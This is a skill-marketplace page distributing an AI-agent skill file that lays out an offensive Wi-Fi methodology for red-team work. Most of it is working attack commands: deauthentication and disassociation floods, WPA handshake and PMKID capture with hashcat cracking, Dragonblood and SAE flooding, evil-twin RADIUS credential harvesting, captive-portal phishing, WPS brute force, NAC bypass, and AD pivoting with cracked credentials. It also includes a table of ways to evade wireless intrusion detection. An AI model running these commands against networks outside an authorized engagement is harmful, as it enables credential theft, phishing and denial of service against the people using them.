‹ 首页

offensive-wifi

@snailsploit · 收录于 1 周前 · 上游提交 2 个月前

Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation.

适合你,如果负责企业无线安全评估或红队无线攻击测试

/ 下载安装
offensive-wifi.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add snailsploit/claude-red/offensive-wifi
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-wifi
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify snailsploit/claude-red/offensive-wifi
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2669GitHub stars
~2.4K上下文体积 · 单文件
镜像托管

怎么用

技能原文 SKILL.md作者撰写 · MIT · aeb41ec

Wireless / 802.11 — Offensive Testing Methodology

Quick Workflow
  1. Pick the right adapter (monitor mode + injection + correct band/PHY for target)
  2. Recon airspace passively — never deauth before you know the topology
  3. Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
  4. Crack offline; do not rely on online dictionary attacks
  5. If WPA-Enterprise, pivot through stolen creds or rogue RADIUS

Hardware & Adapter Selection

| Chipset | Strengths | Notes | |---------|-----------|-------| | Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only | | Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: aircrack-ng/rtl8812au | | MediaTek MT7612U (AWUS036ACM) | Stable dual-band | Modern kernels in-tree | | MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required | | AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release |

# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"

Reconnaissance
# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg

# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon

# Hidden SSID — wait for client probe or force deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon

# Wigle / Kismet for war-driving
kismet -c wlan0mon

Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.


WPA / WPA2-PSK
Four-way Handshake Capture
# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Verify the EAPOL frames are usable:

hcxpcapngtool -o hash.hc22000 handshake-01.cap
PMKID (No Client Required)

PMKID lives in the first AP-to-station message — you can grab it without anyone connected.

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1 --filterlist_ap=targets.txt --filtermode=2

hcxpcapngtool -o hash.hc22000 pmkid.pcapng
Cracking
# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule

# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -

WPA3 / SAE
Transition-Mode Downgrade

If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.

Dragonblood (CVE-2019-9494/9495/13377)

Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.

# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
SAE Auth Flooding (Resource Exhaustion)
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments

WPA-Enterprise (802.1X / EAP)
Method Identification
# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V

| Inner Method | Attack | |--------------|--------| | EAP-MSCHAPv2 (PEAP/TTLS) | Crack NetNTLMv1-style challenge offline | | EAP-GTC | Cleartext password — capture via rogue RADIUS | | EAP-TLS | Steal client cert (often in user keychain / DPAPI / NDES) | | EAP-PWD | Dragonblood-class side channels |

Evil-Twin RADIUS (MSCHAPv2 / GTC)
# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds

# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt

Critical: organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with ServerValidation disabled (common for BYOD) will hand over creds.

EAP-TLS Cert Theft Paths
  • DPAPI master key + cert blob from user profile (%APPDATA%\Microsoft\SystemCertificates)
  • NDES misconfig (ESC8-class cert request abuse)
  • ADCS user auto-enrollment template with weak ACL

WPS
Pixie Dust (Offline)
# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon

Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.

Online PIN Brute (Last Resort)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy

Evil Twin / KARMA / Mana
Stock Evil Twin (Captive Portal)
# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd

# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon
KARMA / Mana (Probe Exploitation)

Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.

# hostapd-mana
sudo hostapd-mana ./mana.conf

# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
  --auth wpa-eap --creds --hostile-portal
MAC Randomization Defeat

iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.


KRACK & FragAttacks

| Attack | Class | Target | |--------|-------|--------| | KRACK (CVE-2017-13077..082) | Key reinstallation | Unpatched WPA2 supplicants | | FragAttacks (CVE-2020-24586..588) | Fragmentation/aggregation | Most pre-2021 implementations |

Test a network's patch status:

# Vanhoef test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
./krack-test-client.py
git clone https://github.com/vanhoefm/fragattacks
./test-fragattacks.py wlan0

Deauth / Disassociation Attacks
# Single client deauth (use for handshake capture)
aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon

# Broadcast (DoS — only with explicit authorization)
mdk4 wlan0mon d -B target_bssids.txt

# Disassoc + auth flood combo (kicks then prevents reconnect)
mdk4 wlan0mon a -a AP_BSSID -m

802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.


802.1X / Wired NAC Bypass (Adjacent)
# Sniff valid 802.1X exchange on wired side
tcpdump -i eth0 -w nac.pcap ether proto 0x888e

# silentbridge / nac_bypass — transparently bridge through an authenticated host
git clone https://github.com/s0lst1c3/silentbridge
silentbridge --takeover --phy wlan0  # variants for wired

Wi-Fi 6 / 6E / 7 Considerations
  • 6 GHz (Wi-Fi 6E) disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec.
  • OFDMA / MU-MIMO: legacy injection often misaligns with RU allocations — verify packet delivery on test bench.
  • TWT (Target Wake Time): deauth windows differ; observe BA sessions before injecting.
  • MLO (Wi-Fi 7): a single client over multiple links — capture must cover all links to recover full session.

Sidebands & Adjacent Wireless

| Tech | Tool | Notes | |------|------|-------| | Bluetooth Classic | redfang, crackle, btproxy | LMP/L2CAP fuzzing | | BLE | bettercap, Sniffle (TI CC1352), Frontline | GATT enumeration, LE Secure Connections downgrade | | Zigbee / 802.15.4 | KillerBee, apimote, ATUSB | Touchlink commissioning abuse | | Z-Wave | Z-Force, EZ-Wave | S0 key reuse bug class | | LoRa / LoRaWAN | LoRaPWN, ChirpStack | Join-request replay, ABP key reuse | | 433/868 MHz (Sub-GHz) | HackRF / Flipper Zero | Garage doors, doorbells, telemetry |


RADIUS / Backend Pivots Post-Compromise
# If you crack a domain user via PEAP-MSCHAPv2, pivot to AD
nxc smb dc -u captured_user -p cracked_pass --pass-pol

# If RADIUS server is stand-alone (FreeRADIUS), check users file & MOTP secrets
# If on Windows NPS, pivot via the service account context

Engagement Cheatsheet
# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
sudo iw reg set US

# 2. Recon (do not deauth yet)
sudo airodump-ng wlan0mon --band abg --write recon

# 3. PMKID sweep (passive)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# 4. Targeted capture if PMKID empty
sudo airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon &
sudo aireplay-ng --deauth 3 -a <AP> -c <client> wlan0mon

# 5. Crack offline
hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule

# 6. If enterprise → eaphammer evil twin
# 7. Document SSID, BSSID, channel, RSSI, encryption, attack used, time

Detection / Defender View

| AP/WIDS Detector | Trigger | Evasion | |------------------|---------|---------| | Excessive deauth | >5 deauth/sec from one source MAC | Spread across spoofed MACs, target individuals | | Rogue AP detection | Unauthorized BSSID on monitored channel | Match real BSSID's beacon timing/IE order exactly | | Karma response anomaly | AP answering all probe SSIDs | Use Mana mode, pick one plausible SSID | | WPS lockout | Repeated PIN failures | Pixie Dust offline only, abandon online brute | | RADIUS log: cert mismatch | Supplicant rejects evil-twin cert | Use copies of victim CA-signed certs (unlikely) |


Key References
  • MITRE ATT&CK: T1200 (Hardware Additions), T1557.004 (AiTM via Evil Twin)
  • IEEE 802.11-2020 (combined spec including KRACK mitigations)
  • WPA3 Spec / Wi-Fi Alliance: dragonblood.net for vuln tracking
  • hcxtools / hashcat WPA modes: docs at hashcat.net
  • Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。